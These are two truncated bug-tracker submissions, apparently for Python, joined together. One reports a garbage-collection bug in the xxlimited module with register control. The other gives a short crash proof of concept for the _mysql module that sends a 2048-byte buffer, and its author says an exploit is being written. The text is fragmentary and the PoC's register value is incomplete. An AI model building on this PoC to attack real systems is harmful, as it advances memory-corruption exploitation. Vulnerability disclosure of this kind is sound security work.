New submission from zeroinside:
Hello
I found incorrect gc behavior in xxlimited module.
After an hour of investigation, I'm still not sure its security related problem.
I have a partial control on RBP register, depends of memory layout.
GDB:
Starting program: /usr/bin/python3.6
[Thread
New submission from zeroinside:
Hello.
I found a vulnerability in _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX=0x
payload="A"*2048
_mysql.result(payload,RDX)
It's exploitable bug, I'm working on exploit.
(gdb) run mysql.py
Starting program: /usr/bin
